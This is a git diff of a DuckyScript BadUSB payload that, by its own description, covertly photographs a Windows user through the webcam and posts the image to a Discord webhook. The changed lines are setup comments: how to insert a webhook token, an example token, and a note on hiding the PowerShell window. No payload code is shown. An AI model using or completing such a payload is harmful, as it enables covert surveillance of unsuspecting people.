diff --git a/Webcam-to-Discord/Webcam-to-Discord.txt b/Webcam-to-Discord/Webcam-to-Discord.txt index 410d87d..9cf6c13 100644 --- a/Webcam-to-Discord/Webcam-to-Discord.txt +++ b/Webcam-to-Discord/Webcam-to-Discord.txt @@ -3,10 +3,9 @@ REM Author: @beigeworm REM Description: download a webcam.dll file, find a webcam cand take a picture then send it to discord. REM Target: Windows 10 -REM Replace YOUR_WEBHOOK_HERE with your Discord webhook URL - -REM some setup for dukie script -DEFAULT_DELAY 100 +REM *SETUP* +REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook Channel and Token ONLY +REM eg. $dc='1206563651960586035/sNqypsq629XmXpc9TP924Dxeox6qMHDCI5e27qJ3fw4ef34wff4wf_df3aFOY' .... REM open powershell (remove "-W H" to show the window) DELAY 1000